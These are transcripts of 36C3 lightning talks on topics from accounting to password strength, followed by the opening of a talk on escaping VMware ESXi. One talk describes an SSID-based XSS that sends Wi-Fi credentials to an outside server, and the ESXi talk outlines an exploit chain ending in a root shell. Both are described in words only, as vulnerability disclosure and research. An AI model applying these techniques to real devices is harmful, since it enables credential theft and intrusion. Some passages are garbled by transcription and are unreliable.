beautiful. 80 kilometers from Belgrade. Very nice. Some key facts about Congress. We started in 2040 as a small conference. It was around, let's say, less than 100 people, 20 speakers, something like that. Up to seven years, we grew up to 500 visitors, and we have more than 40 speakers in more than 20 countries. Some of the highlights from the Balkan that were our guests and that maybe it's interesting and that they are supporting us now. It's Travis Goodspeed, virus, Zos, Mitch Altman, Robert Simons. There is a lot of them, numbers. You can name it. We try to give them the best. What's good at Balkan that you can also join us playing CTFs. So, if you want, there is a CTF. You can play with us. But also what's also interesting is that we also have a HeboCon. So, we started this year and we found it very interesting and we will continue it. If you have any questions, how to reach there, because I know it's Serbia. It's not so popular place. There's not people who have not visited yet. But if you want to find out how to reach us, you can visit us at Balkan Assembly or you can contact or you can send us an email. We will rather help you. Because we think that more people have come from abroad to visit our small conference because we are building community in Serbia and in Europe. So, we want to show them how it's looked like. And I think that's important. There is a lot of students there that don't have so much money to travel and that's one of the reasons why we started this. Because in Novi Sad, you have big technical university and with a lot of students, young people, that are interesting in techniques and hacking. So, the key facts from this whole story is Balkan 2020, 25th, 26th, 27th, September, that's for remembering. Novi Sad, Serbia. You have the webpage for others. Please contact us. Thank you. Thank you. Next up is a concise introduction to double entry accounting. All right. Hello, everyone. I'm going to skip the intro today because I've already done that yesterday. My name is Luis and we're going to talk about double entry accounting. What I'm going to talk about has been known for a few centuries. It's why you use my accountants today and the way I'm going to frame it is heavily influenced by my use of new cash. Accounting lets you track money movements across accounts and we have five different types of accounts. Type one, assets. Assets accounts hold the money that you have in your bank accounts because it would be like a physical asset that you can evaluate the value of. Type number two, expenses. Expenses accounts hold the money that you have spent. Type number three, income. Income accounts hold the money that you have received from, for example, a salary. Type number four, liabilities accounts, hold the money that you owe to someone else. It can be any form of debt. And type number five is a bit more abstract. It's called equity. You have to imagine equity as the global wealth in the world from which your own money is poured off. And use the equity accounts to set the initial value, the initial balance of your assets accounts. You take the money that you have from the world, then you know it's yours and use that to open your balances and your assets accounts. Accounts from a Yorkey and you can see on this picture on the left that the top level of the Yorkey correspond to the five different types I've laid out before. Now let's take an example of what money movements look like in the Balantra accounting. In this example, I have four different accounts. Accounting represents my wallet, that's assets, cash. An account represents my checking bank account, that's assets checking, an account for categorizing food expenses, that's expenses food, and an account to categorize banking fees, that's expenses fees. Let's add two transactions in those accounts. We can see that the first transaction at the top is a $20 withdrawal from the bank and I've incurred a $3 fee, which is a very common thing in the U.S. And then with the money in my wallet, I've used that to buy some food. Within transactions, we have a further concept called splits. A split is a debit, meaning you like take money out of an account or a credit, meaning you put money in an account. And so for example, in the first transaction, we have three splits. On the left, we have the $20 credit to my wallet. Then after that on the right, we have the minus $23 out of my checking account. And then on the right on the first transaction, we have the $3 fee. Same thing for the second transaction. A fundamental property of the voluntary accounting is that within each transaction, all the splits, if you add them, all the debates, which are debit and credit, if you add them, they sum up to zero. And that's super interesting because it means that with this rule, you cannot make money appear or disappear. The voluntary accounting is very much like chemistry. You cannot invent elements from nowhere. Nothing appears. Everything gets transformed. It's exactly the same concept. Likewise, if you add all the splits in the other direction, meaning all the splits in a single account, you actually get the balance of that account. So in my wallet, I had like a $20 credit and then an $8 debit. And so my balance in my wallet is $12. You can do this for all the other accounts. This property is reflected, like that zero sum trick is reflected in the accounting equation. The accounting equation is to calculate how much money you actually have. And you basically stack net worth. Net worth means how much money you actually have. And it's just a simple subtraction. You take all of your assets and you subtract all of your liabilities. So you take all the money you have and you subtract all the money that you owe. And that tells you how much money you actually have. And NewCash displays that at the bottom of the icon hierarchy. Then I'm going to give you a few tips about NewCash. The documentation is split in two. There is an help manual that's about an interface itself. And then there is a concept manual that dives deeper into what I've explained today and yesterday. And it covers accounting and like how to like different accounting methodology and so on. And I found this manual, the concept manual is much more helpful than the manual in the interface. Then I have some NewCash tips. This is not an exhaustive. I'm not even going to go through it. But I think my favorites one are and it's not included. The first one is not included is that when you start using NewCash, do not try to import all of your transactions, all the history that you have in your bank. Just start from today. Take how much money you have in your accounts. Set that at the opening balance and go forward. Don't spend like days trying to import all of your history. It doesn't really matter. Then one of my favorite tips are use a mobile app to track your cash expenses. There is one on Android that's supported by the project and there is another one on iOS that's a bit harder to use but it's fine. NewCash is a very mature piece of software. Like interface, some people tell me they gave them eye cancer. NewCash didn't give me eye cancer. It's clunky but it doesn't matter. Accounting hasn't changed in like centuries. Like it's fine. It works. I find it cool to be able to like backup a version of your accounting books. That's what NewCash, the file that NewCash gives you. Like archives that's cool. What else? Yeah, make sure like unlike other things at congress, like accounting is something you cannot really hack. If you're hacking it, you're doing it wrong. You need to understand what you're doing. And that's about it. I can help you set up NewCash anytime today or tomorrow. Feel free to contact me and that's about it. Thank you so much. Thank you. Next up is your crowd. Okay. Hey guys, my name is Till. I'm part of a small group of legal professionals and we want to present you a small idea of ours which we call your crowd. So this talk is going to be about the legal tech market in Germany. A problem that we see of possible monopolization or oligopolds and a solution that we call your crowd and that way. So we start with the legal tech market in Germany as such. It started in the 1970s with legal informatics. We just tried to bring this together informatics and legal professionals because the legal language is basically pretty rule-based so you can try to automate this very simply. But in the 1970s we had storage capacities which were limited and also the computing capacity was limited. So we had lots of ideas but we just could not implement it which changed around like 2011 till 2017 where lots of companies put up and they put up some nice tools on the market where it's not rocket science, it's mostly about text analysis, text recognition and you try to optimize simply legal analyzes. But that lead to a lot of efficiency on the legal market because some lawyers could simply, they had a lot of repetitive work and now they can try to optimize via legal tech and save their time. So some lawyers reduced the working time by 70% having the same income as such and now they spend 70% on pro bono work which they could not do before. And another thing is that we now have a greater access to justice. An example is FlightRide. No one cared about flight delays before FlightRide and now even we have a new system with Avocado and they get your money back from here FlightRide even for free. So and these are a lot of companies that work in that market. Well what's the problem that we see there? It's not necessarily the the technique as such even if we can discuss it but it's more where that comes from because at the moment it's more that startups with a lot of venture capital and a lot of big law firms who are outsourcing their development implement their technique. And they have a lot of money to produce the products that they want and they produce mainly software which is specialized for small law firms or their law firm and which is made perfectly for their firm either if the workers in the law firm work with the software internally and make it perfect or externally. And they invest mostly in software and their own workers to do so but small law firms cannot do that really. So because they have no money no time to do that and they don't have the capacity of big law firms which can work collaborative with IT specialists and have very big teams to work on that problems. They only have individuals who have an IT interest maybe in the law firm who try to implement that thing so some of them are a bit upset about that because we might get new dependencies because big law firms try to implement their software license it to small law firms and on that way these products get on somewhere pretty expensive. And on the other hand also the big law firms get on the market of the small law firms because big law firms before just focus on the big cases not on the small ones the small law firms took care of and now they get in that market and it might be the chance that we get something like Google on the legal market. It's not necessary that will happen but it might be the case which is not necessarily new that we have these dependencies because in law we don't have a system of open knowledge as in other sectors we have two privatized search engines like back and yours for legal knowledge and they're pretty expensive. But with legal tech now we might get just new dependencies by automizing your processes in your legal law firm or you just might disappear from the market if you don't use their techniques. So we will think okay how could you change that and we looked in practice and we saw okay in informatics you just used GitHub to share knowledge you just talk about what you're doing which lawyers at the moment don't do they don't share knowledge. We have projects like Gaiacs where they try to upload lots of documents in the cloud even if you don't like the cloud as such but the idea to share documents is interesting and we know that we can distribute work even if we don't like captures but it shows that we can distribute work over a huge crowd and get things done and we saw this guy this is Joseph and he was able to predict court cases or well doesn't matter I just skip that but our idea is well we just combine expert systems like lawyers let them form a crowd a group to share their knowledge their documents maybe use algorithms like machine learning to get something out of their documents which we have not seen before and let them try to distribute the work to develop their own techniques which they want like we have it with GitHub with informatics bring the lawyers together and let them share their knowledge all they have and maybe let them form collaborative teams so they can work and if you want to help us contact us thanks thank you all right next up then is there's JavaScript in my power plug hey I'm Harry welcome to my talk there's JavaScript in my power plug I will tell you the story how I found my first cde you pressed the wrong button I think because you don't press anything right now please now go ahead to the right yeah because working yeah one day I walked through a supermarket and found a smart IOT power plug and it promised it can be controlled via an app from all around the world and I thought hey um maybe I'm able to control it without it or somebody else is able to control it also so um I started reverse engineering it first we dumped the flash image and saw some JavaScript flowing through our terminal so one of my colleagues said hey there's JavaScript in my power plug um then we used simple tool tools like strings to um analyze the binary and found that they are clear text Wi-Fi credentials in the flash image which is also a very interesting point so we used GDRA to reverse engineer it and to search for bugs and especially for the configuration interface where the JavaScript comes from so it details to the cde um it is a bug in the usr Wi-Fi 232 module it is like kind of a shitty ESP and it is in the configuration interface um where you can obtain status information do firmware updates and this configuration interface also renders a list of nearby Wi-Fi networks where you connect to um so what you see on the bottom is the source code maybe you already have an idea about the bug because if you open a Wi-Fi network with a malicious SSID nearby so if you put JavaScript in your SSID and somebody opens the configuration interface and reloads the page then this JavaScript gets executed and we have a cross-site scripting attack um this can be utilized by loading a more complex script from an external server and within just this JavaScript we can then do an HTTP GET request to the web interface page where the Wi-Fi credentials are inside and append this result to a request to a domain we control or for example to request catcher.com so we can leak the Wi-Fi credentials um from the home network where this module is locked in this looks like that on the right side you can see the JavaScript export code um it is not very well written but enough to show the concept on the left side you can see the request catcher um the sensor part is the password and um below this you can see that it's also possible to leak the username and password of the web configuration interface itself so some words to the disclosure process um it is a Chinese company from Shenzhen who produces this module and they didn't react to any of our emails so we requested a CVE from CVE.mitra.org um I'm currently doing this lightning talk and I also write a blog post at Tilda Home so a short conclusion um if you use this module in your Wi-Fi network it is possible to steal the Wi-Fi credentials via cross-site scripting export by opening Wi-Fi nearby with a malicious SSID next step could be um to gain code execution in the code there are a lot of Sprint Fs without a length check and seems like they wrote their own protocol parsers for example an own DNS parser and custom protocol parsers um we expect some buffer overflows to be found there um which can be exploited so if you want uh details and the proof of concept code um you can have a look at the blog post or you can contact me via email or decked thanks for your attention thank you all right next up is Meriway Research Telegram group thank you welcome everybody this will be a short lightning talk about a open research group we have on telegram uh there are currently nearly three and a half thousand members in here so first up I'll tell you really short something about myself what the group is and how you can join and I think that should all fit within five minutes so my name is Max Kersti I go by the nickname of Libra I'm one of the administrators of the group um I worked as a malware analyst before I currently I work as a threat intelligence analyst I write my own blogs uh and tools which I also discuss in the group together with other people who also do similar things so what is it it's a public group meaning anybody can join there's no vetting no invite process the last slide will contain the join link for whoever wants to join uh we're strictly white hat we don't do pawning of anything uh we just analyze them all where I help each other out when we have questions uh the target platform you have or the architecture doesn't matter too much there will always be someone who can help you out so you can have a couple goals when you join the group itself uh you can stay up to date on the latest news and developments uh new tools that are being released uh are also published in here you can learn from the questions of others maybe someone else is stuck with a problem you never had or never encountered by chance uh but you might have use of in the future you can collaborate with people uh there's multiple small groups that split off that did small things uh I created a group there's small subgroup uh myself and a couple of people I know in there we have some projects running you can ask any question you like as long as it's related uh we have a weekly item uh the current week is week two for the running of this uh where we in this case for example discuss things that you within your company your experience uh changed within a company or with uh within a network uh and see what had the benefit out of that so we can all learn from each other there uh there's a pin message with resources these resources uh vary uh some of them are how to obtain new samples some of them contain tips and tricks some of them contain posters but in general there's a list of resources that you can use the rules are also described in there uh the tldr of the rules is be excellent to each other and and don't do anything weird um the group consists of students and professionals alike uh I don't believe there's much of a difference uh aside from some experiences in some cases but it's open to anybody who wants to join um as a last remark at the end of all lightning talks so the end at 1345 uh we'll be having a first meetup at the left exit of Borg uh starting from around uh 1345 till uh 1400 is the gathering I guess and then if there is enough people we'll just move somewhere and if not we just stay there uh since we don't want to block the exit for others if you want to join this is the join link uh you can also search within telegram uh for malware research and you should find this one uh you can take pictures you can write it down uh do whatever you want with it and uh hope to see you either in the group or uh the exit after all lightning talks thank you thank you next up is privacy mail there we go okay thanks a lot um so uh I'm going to be telling you something about uh privacy mail it's an email privacy platform that we developed at teodamstadt uh we is myself Stefan Schwer and my professor Matthias Hollig um and also uh yeah so um your first question might be wait email tracking I mean usually when we talk about email privacy we talk about Alice and Bob wanting to exchange a message and we don't want like all of the evil people that are on the wire and in the servers to know about it um this is not what we're talking about here we're talking about the fact that the sender of the message wants to actually know if the recipient of the message has read the message so it's not private communication between two people it is for example amazon sending you a newsletter and wanting you to click links um when you want to track emails um there's usually three different things you can do you can track views so you can track it by for example including remote images or remote style sheets and then when the email is opened with remote content enabled uh a request will be sent to the server of the analytics company and uh they will know that you open the email the second thing is you can track interactions uh this usually happens by using personalized links so you have a link that is only used in this specific email to this specific person and if that link is clicked you know that this person clicked this specific link in the email fairly straightforward and finally you can also link identities because if you think about it you have your emails usually on your laptop and on your phone and then you will have um like all of the nasty web tracking that is going on um which will have a profile of you on your phone and the profile of you uh on your laptop but if you click the same link or a link with the same identifier uh both on your laptop and on your mobile phone then this can be used to link the identities that they have so they can basically merge the profiles from your phone and from your laptop so this is actually fairly interesting so um depending on who you ask between 24 and 85 percent of emails contain tracking the truth was probably somewhere in the middle um the person sending you the email knows if you open the email when you open the email which device you used um which software you use so Thunderbird webmail whatever and where you were based on loose IP based geolocation of course always if you have remote content enabled and click links and all of this stuff so uh we built a software that is intended to detect this kind of tracking and uh make sure that um you basically know what you're getting into when you register to a newsletter and to do that you go to our website uh privacymail.info and you tell us look I want to sign up this specific service like example.com and then we give you an email address that only belongs to this service you sign it up with that service um the service will send us the opt-in message we will check that there's no shenanigans going on and then um confirm the registration of the newsletter please don't try to register accounts we will not click confirmation links thank you very much um and then we will receive the newsletters um and with these newsletters we of course received them on our email server and then get them into our crawler our crawler uses open WPM which is in uh basically a variant of Firefox that you can remote control and that is intended for online privacy research and with that software um we then open the email also click a link track all of the um all of the interactions that are happening so all of the requests that are being sent and so on the results are of course written into a database and then we have an analyzer that um basically creates the results that we can then display on our website so this is a subset of what you can see on our website here you can see for example if you read the newsletter from spiegel.de you will see that there is um four external parties that are contacted when you open the email um including um spiegel themselves but also newsletter to go IOAM which is a some sort of german tracking company and uh similarly when you click a link there is also um additional third parties that are being uh included in basically a long redirect chain until you reach your final destination. Um I actually gave a longer talk on this topic at gpn this year so if you're interested in more details um take a look at this talk you can also find the link to that um down at the bottom at this mass.xyz slash talk slash gpn 2019 you find the slides you find the paper everything and of course a link to the platform um with that so you can play with the platform at privacymail.info it is of course open source so you can also send pull requests or take a look at uh what it looks like and right now I have a student who is working on redesigning the interface and for that we would be really interested in finding out um like what your priorities and concerns are when it comes to email tracking is it worse if they track which links you click is it worse if they click uh if if they track if you open the email and so on so if you have like three minutes of time and are willing to like fill out a survey you would help us a lot in uh making this redesign and with that thank you very much I'm running around here at congress feel free to talk to me. Thank you. Next up is open age. So hi uh we are the open age maintainers and this is our really update talk. Open age is a free engine clone of HF Empires 2 uh we are uh trying to provide the original look and feel of the game um for that uh we uh need to use the original assets since we are no artists uh but we plan to spot free replacement asset packs uh the project was started six years ago when we didn't really know what we were doing uh with the main goal of providing unlimited extension possibilities think about uh support for more than eight players uh actual sane networking stack or like really crazy map uh mods like a zombie survival pack or whatever uh there is a lot of uh similar projects for other classic games which you can see conveniently listed here um the game is uh based on C++17 with uh Python 3 used for scripting and sizing for the glue layer. So uh HF Empires is still very active even in 2019 um because yeah uh Microsoft just released the definitive edition with vastly enhanced graphics and uh uh fancy new UI um yeah we're not quite far but we're getting there and uh this year we uh mainly had a documentation overhaul with uh fancy Sphinx stuff defined uh our modding API um started the conversion of the original game to that new API have continuous integration for macOS and Windows, nightly builds for those and Linux and we have world first SMX, SMP conversion for the um definitive edition graphics. So with that we can uh extract uh for example uh Asia graphics set assets. Then we have uh nightly builds uh hosted for convenient download and uh also continuous integration now uh based on AppVayer. The documentation now looks also way uh fancy here and is easier to browse and read. Um maybe you remember from our previous talks that our configuration system was this uh domain specific neon language um we now need to use that to create uh asset packs. Um in order to create those we have to convert the original uh Gini engine data to our engine and this is the structure of the converter so we convert uh the data to intermediate objects which we then uh basically export to our format and uh in parallel we can export the uh media file the images and sounds. Our goal engine architecture looks roughly like that so we have a separation between uh the simulation of the game world and the presentation of this uh game world um and uh so the next steps to um reach that is to actually implement the presenter and extend the simulation engine for um the actual gameplay features. Then we need scalable path finding because yeah we want to support many many units um and also think about how we do that over network. Um with uh the scripting API we uh need to introduce Python stuff so that also artificial intelligence uh programming can be done with fancy machine learning whatever you like. Um in the past year we had uh in the past years we had 140 contributors so if you have uh some interest in joining we'll always be happy about you and you can crunch some issues. Um to reach us you can either visit us at our assembly or join one of our uh chat rooms or write on uh whatever platform else we have. We also have a blog where we occasionally post status updates um whatever is going on in the project. So uh in case you want to check us out uh here are the GitHub links and we'd be happy to see you contributing. Thanks. Thank you. Next up is Beesheitz Amsterdam. Hi um uh Beesheitz is a community led conference for people involved in security and uh local organizers create their own instance in the city and so last year I discovered Beesheitz uh and there was an event which was going to be hosted in Amsterdam and they've been hosting it for the last two years and I thought that's where I would like to be. So I'm going to go ahead and go ahead and do some work. So I'm going to go ahead and do some work. Um and I'm going to do some work. Um and then I'm going to do some work and then I'm going to go ahead and do some work. Um and then I'm going to do some work. Um and then I'm going to do some work. Um and then contribute to uh contribute and if you want to get it out whether you're in the Netherlands or in Germany or Belgium then you're welcome to come and visit and see and talk. Um so send your proposal, send us your proposal uh before the end of February and uh perhaps we can see I can see your talk. Thank you. Alright. Thank you. Uh then next up is let's invent futuristic sleep and dream technologies. Hello. Um I'm Chris Sofa and uh welcome to my uh lightning talk. Let's invent futuristic sleep and dream technologies. Um so wouldn't it be cool to go to sleep and wake up with new knowledge or skills? So for example go to bed and in the morning next day you suddenly speak Spanish or speak a new programming language. Um or to have quite high quality restful sleep no matter where you are. Or to maybe have some immune system boosting sleep so maybe you have a code like like I have at the moment and you just go to sleep and uh it doesn't take seven days but it just takes one night until you are healthy again or maybe cure other diseases overnight or maybe even have interactive dreaming so um be able to talk from within your dreams to the waking world or maybe to other dreamers. Um there are many other ideas that can be thought of about uh how the future of our sleep and dream experience might look like and actually I'm looking for people who want to invent these kind of futuristic sleep and dream technologies uh together with me. Um not for the money so this is strictly non-profit um but uh just to uh improve the sleep and dream experience of potentially billions of people and of course also to have a fun while developing this uh crazy things and uh making things possible that are seemingly impossible. And yeah it might take decades uh to invent these kind of uh stuff so learning a new knowledge uh new language for example during sleep but um well why not start today and move closer to this uh goal uh step by step. And so actually I've started already um with uh this uh project uh set up a small website and uh also connected to professional sleep and dream researchers. I also conducted some first studies with them and also started publishing the results in peer review journals. Um also developed some stuff and um also I uh recycled some old stuff from my PhD which was actually about sleep research. I was a sleep laboratory manager at a university for some years and um now after this time I just do this as a hobby anymore. And yeah but uh so some things have been prepared but the real fun is starting only now so actually really inventing these kind of things uh getting some uh ideas what could be done um and uh also then to find ways to make this possible somehow. And yeah so if you uh find this interesting and if you want to get involved into this because maybe you have some ideas uh what could be done, what should be done, also what maybe should not be done uh about futuristic sleep and dream experiences or if you want to develop some uh hardware, software, printed circuit boards whatever um or if you have some other skills that might be available even if you don't really know what uh and when and how to do uh stuff that uh could contribute to this then please uh get in touch with me um either via email. So I've created this uh email address, futuristic sleep dream text at protonmail.com uh or talk to me here at the conference and I'm really happy to uh hear from as many as possible from you. And uh if you first want to read more about it then there's this website SD20.org which stands for sleep and dreaming in 20 years um so you will find some more information on that website. And yeah so uh let's invent futuristic sleep and dream technologies. Thank you. Then next up is investigating organized crime. Hey everybody um so my name is Friedrich. I work with a group of investigative journalists that's kind of spread throughout um the world and as I mainly use in Europe. And um I want to talk about the technology aspects of what we can do to facilitate the work of investigative reporters. Most people in this room will probably first think about um security aspects, cryptography, but what I am most interested in is uh the security aspect of what we can do to facilitate the work of investigative journalists. And so I'm really excited to talk about um security aspects, cryptography, but what I'm most interested in is kind of the data analysis aspect of doing this. Um so for example a little while ago um in early December we published a series of stories um about a company called FormationSouse um based in the UK that set up all kinds of weird fraud on schemes around the world. They used to be in the forest in Cameroon and grow weed there and um all of which was kind of very shady and illegal. Um but how do we get to these stories, right? How do we kind of get to this evidence? Um the data that we got was basically a dump of that company's server, right? Coming from a group called DitoSecrets. And um it comes as zip files, right? Massive zip files where you have millions of emails, you've got documents, you've got even a dump of a MySQL database that they used internally. And how do you go from there to actually having journalism, right? How do you tell stories based on just random zip files? Um so you, reporters need access to structured and unstructured data, right? Sometimes data is in documents, sometimes data is also in a structured database um and people need to be able to see that. Um then you need to be able to find overlap between data sets, right? So if you have an email in one, in one uh dataset that might be um might have a phone number in its signature, right? And that phone number was then in another dataset used to set up a company that might already be the crucial connection that you need to find in order to link things and tell good story. And then also this stuff gets really complicated, right? We look into a lot of offshore companies and so um what we need to do is we need to also keep track of what we're finding. Um so for a couple years now we've been working on this thing called the ALIF project and it's at this point kind of a toolkit of different components. Um there's a search engine um called ALIF which is basically um kind of a graph, knowledge graph explorer that can um give people access both to um both to structured data, unstructured data, um can do forensics on large numbers of file types and extract all the kind of useful bits and pieces and show up connectivity between them. Um it can also do cross-referencing between different datasets, right? So if you have like a list of all the politicians in the country and you have a list of all the offshore companies in the Panama Papers, you can just kind of go and compare that. And we've also been working on this thing called VIZ which is basically for making these little network diagrams where people can kind of keep track of what their stories are. And obviously all of this stuff is free software and um I'd really like to find people to work on that, help us. Um especially if you are maybe a pen tester or you want to work on more data import mechanisms or better data visualizations. Um one thing that's kind of particularly fun about this um is that basically underlying all of it is just streams of JSON entities. Um so you can think about structured data, unstructured data both as just kind of line-based feeds of JSON entities. Um they're all formatted according to an ontology that we've developed basically in a knowledge graph model that we've called follow the money. And so basically a lot of what we do is just convert stuff to this follow the money format and then you can do um whatever kind of operations you need to do with it. So in this case for example you can just pip install um a thing that downloads all the people from the 29 leaks um the formations house data that I was showing um puts them in a JSON file and then you can take that JSON file with all the people that have been sending and receiving emails in that data dump that I was showing at the beginning and say okay there's those and then there's the Panama Papers data uh published by ICIJ and you can kind of say okay find me possible matches between them um and then you've got yourself a list of candidates and that's something that a journalist might already want to look at and say okay if someone is both involved in dealing with formations house but also is involved in um in uh or was uh mentioned in the Panama Papers that's good enough for me to spend my time on to give my attention and um yeah so if anyone is interested in hacking on tools for investigative reporters uh go to alftata.org. Thank you. Thank you. And next up is uh the very small 1 by 1 of passwords 1 by 1, 1 times 1. 1 by 1. 1 times 1. Okay. Yeah I have looked it up it's the very small 1 times 1 of passwords um it's actually a stripped down version of a bigger talk and um yeah um there are some amazing passwords out there and um for me it's interesting that I have a very small password and um yeah um there are some amazing passwords out there and um for me it's interesting is my password actually working and how do I manage all these passwords so let's start with how do we manage all these passwords um we um I can strongly recommend using password managers at some point um because with that you can um set different passwords for each account you don't lose track which password have I used on which account in which iteration and so on and so on um there are a few password managers around for example password store um aka pass uh there's key pass around you can also use a notebook uh if you store that safely in some place um yeah there are lots of possibilities unfortunately uh you have still have to remember some passwords to unlock the password managers um to unlock the password managers so if we have a password prompt um there's the next thing um called brute force protection and that's some sort of mechanism that um helps um that's uh the password can't be can't can't be tried out so um yeah but brute force protection is actually harder than you might think it is and um that leads to the right password length um because long is good but not always practical um and that means I have to determine somehow how long the somehow how long my password have to be and um maybe we can calculate it the needed length um maybe you remember the xkcd comic with the um diceware passphrase where they just add up um certain amount of words and say oh it's much easier to remember um um some random words from a word list and the system behind that is diceware because you can basically roll a dice to um five times and then you pick um a word from a list with the number you have um you have diced and um yeah um how is that working uh basically let's go back to the air shield example in the first slide one two three four five is a number obviously uh so can I build all my passwords as a number um if I have a certain amount of characters we have different number systems with different um amount of digits or characters in it so yes um those are all numbers and there is um um a formula for that so you can the amount you can use the amount of digits in uh uh as a power of the length um of your password and you get the amount of combinations so uh this is for a 256 bit key in the binary system it's a huge amount for a four digit uh digit numerical pin it's obviously a bit fewer um combinations and um now the idea is that we take those amounts and um make an equation out of it then we transform this equation and we get a nice formula um how many digits uh we actually need for um a certain length of password so let's assume uh that we use uh alpha numerical characters uh so we have 56 digits um so for a 256 bit equivalent key we need uh 44 characters and you can try to remember the example in the um bottom of the slide it's very hard to remember so now get back to the diceware diceware means we have 7776 words that can be randomly chosen by either rolling a dice or by using some software um we put that into the formula and we um get uh uh length of 19 words that we need and um yeah you can much easier remember but the password is a bit longer and um yeah that's for the mouse so far there are some two factor systems around um if you want to secure your passwords even more you uh just use two factor with SMS ton one time pets or uh some uh unique passwords lists and uh always remember biometrical attributes are passwords that can't be changed if they have been lost um but on the bright side um you can use it this as a second factor too and finally there are application tokens um so a second password does not have to be authorized with the user password applications tokens are um not used um uh frequently enough but uh it's worth a try and you can find the full 45 minute talks at the archives of the privacy week 2019 which was held in Vienna and I hope I will be there at the next privacy week thank you very much thank you so this concludes today's lightning talk session thank you very much for being here please give a big round of applause for all of the speakers who were here on stage today and again for having to deal with so many speakers in such a short time a big round of applause for the translation team you
Lightning Talks are short lectures (almost) any congress participant may give! Bring your infectious enthusiasm to an audience with a short attention span! Discuss a program, system or technique! Pitch your projects and ideas or try to rally a crew of people to your party or assembly! Whatever you bring, make it quick! To get involved and learn more about what is happening please visit the Lightning Talks page in the 36C3 wiki.
10.5446/53223 (DOI)
So like many operators, in my group we actually use a lot of ESXI servers. You would think that after using these things for 10 years I would know how to speak, but I do not. We use these for virtualizing machines. Some of these actually run sandboxes or run kind of dubious software on it. So we really do want to prevent these processes from jumping from the virtual environment to the hypervisor environment. We have today, we have F1YYY. He wants to be known by F1YYY, so I am respecting that. And he is from Triton security labs. And he is going to show us how the exploits that he discovered in the, I think it was last Chinese geekpon captured the flag. And he is going to show us how these things work. And with that I would like to help, I would like to ask you to help me welcome F1YYY onto the stage. Thank you. Hello. Hello. Hello. Hello. Thanks for the instruction. Good evening everybody. I'm F1YYY, a senior security researcher at Chantin Technology. I'm going to present the great escape of ESSI, breaking out of a sandbox virtual machine. We have demonstrated this full explode chain at geekpon 2018. I will introduce our experience of escaping the sandbox on the ESSI. I will also introduce the work we have done about the sandbox on the ESSI. Now let's start it. We come from the Chantin Security Research Lab. We have researched many practical targets in recent years including PS4 jailbreak, Android routine, IoT offensive research and so on. Some of us also play CTF with Team Bloop and T-Delivers. We recently won the championship at HeadCorn Final. We are also the organizer of the real world CTF. We created some very hard challenges this year. So if you are interested in it, we welcome you to participate in our CTF game. Now before we start our journey to escaping the virtual machine, we need to figure out what virtual machine is capable. I'd like to ask some of you that did anyone use the virtualization software if you have used the virtualization software like VMware Workstation, Hyper-V, Virtual Box and so on. Please use your hands. Okay, okay, okay. Thanks. So if you are a software engineer or a security researcher, you probably have used the virtualization software. But if anyone has heard the word virtual machine escape, if you have heard that, please use your hand again. Oh, oh, surprised. Thanks. Oh, it surprised me that all of you know about that, but I have to introduce that again. What's virtual machine escape? In normal circumstances, the host OS runs on the hypervisor, and the hypervisor will handle some sensitive instructions executed by guest OS. Host OS emulates virtual hardware and handles RPC requests from the guest OS. That's the architecture of normal virtualization software. And the guest OS is isolated from each other and cannot affect the host OS. However, if there are some bugs or if there are some vulnerabilities existing in the host OS, it's possible for the guest OS to escape from the virtualization environment. They can exploit these vulnerabilities. And finally, they can execute arbitrary codes on the host. So this is the virtual machine escape. Then why we choose ESSI as our target? The first reason is we know that more and more companies are using or plan to use private cloud to store its private data, including these companies. And the VMSphere is an enterprise solution offered by VMware. It's popular between companies. If you are a net manager of a company, you may know about VMware VMSphere. And the ESSI is the hypervisor for VMware VMSphere. So it's widely used in private cloud. That's the first reason. The second one is that it's a challenging target for us. There are several explorations of VMware workstation in recent years. Hiccords escape from the VMware workstation by exploiting some vulnerabilities. These vulnerabilities existing in graphic cards, network cards, and USB devices, and so on. But there has been no public escape of ESSI before. So it's a challenging target for us. And we love challenge. Then why is ESSI so challenging? The first reason, I think, is that there are little documents about its architecture. The only thing we can find is a white paper offered by VMware. The white paper only includes some definitions and pictures without details. So let's take a brief look at the architecture of ESSI first. ESSI is an enterprise bare metal hypervisor. And it includes two parts. The kernel, it uses VM kernel developed by VMware. And the other part, the user world. The VM kernel is a politics-like operating system. And it uses an in-memory field system. It means that all fields stored in this field system are not persistent. And the VM kernel also manages hardware and schedules results for ESSI. VM kernel also includes VMVM, drivers, L-stacks, and some user-worlds API offered to the user-worlds. And the user-world is used by VMware to refer the processes running in VM kernel operating system. And the user-world means that a group of these processes. These processes can only use limited prog directory and limited signals. And they can just use some of the politics API. For example, there are some user-worlds processes like hostD, SSHD, VMX, and so on. Then that's the architecture of ESSI. I'd like to give you an example to show how a virtual machine works on ESSI. The VMX process in the user world can communicate with VMVM by using some undocumented custom customized system call. And the VMVM will initialize the environment for the guest OIs. When guest OIs executes some sensitive instructions, it will cause a VMX and return to VMM. The VMX process also emulates virtual hardware and handles RPC requests from the guest. That's how a virtual machine works on ESSI. Then how can we escape from the virtual machine on ESSI? If there is a vulnerability in the virtual hardware of the VMX, we can write a driver or write an exploit to escape from it. The driver will communicate with the virtual hardware and it can exploit the vulnerability. And finally, we can execute shell code in the VMX process. So it means that we successfully escape from the virtual machine on the ESSI. So the second reason about why ESSI is so challenging is that you're the world API. The VMX uses many undocumented and customized system calls. And if you want to reverse some code of VMX, it's hard for you to understand which API the VMX is using. But luckily, we find two system call tables after uncomprising the K-Pone B00 field. There are two system call tables we found with symbols. So this field will be useful if you want to reverse some code of the VMX. This is the second reason. So there are some security mitigations here, including SLR and NX. It means that we may need to link some address information before we start our exploit to break the randomized of the address space. Furthermore, after testing, we found that there is another mitigation on the ESSI. There is a sandbox. There is a sandbox that isolates the VMX process. So even you can execute some shell code in the VMX process, you cannot execute any commands. You cannot read any sensitive fields unless you escape from the sandbox either. And finally, we think that the VMS of ESSI has a smaller task surface. After comparison of the VMS binary between the workstation and the ESSI, we found that there are some functions that have been removed from the VMS in the user world to the VM kernel. For example, the packet transmission function in E1000 net card has been moved from the VMS to the VM kernel. And if you have read some security adversaries published by VMware recently, you can notice that there are many vulnerabilities existing in the packet transmission part of E1000 net card. And all these vulnerabilities only affect workstation. So we think that the VMS of ESSI has a smaller task surface. Now let's start the journey of escaping from the ESSI. Let's overview the entire explosion first. We use two memory corruption vulnerabilities in our exploit. The first one is an initialized stack usage vulnerability, which CVE number is CVE 2018 6981. And the second is an initialized stack read vulnerability, and the CVE number is CVE 2018 6982. And we can do arbitrary address free by using the first vulnerability. And we can get information linkage from the second one. After combining of these two vulnerabilities, we can do arbitrary shell code execution in VMS process. And finally, we use a logic vulnerability to escape the samples of VMS and reverse a root shell from the ESSI. So that's 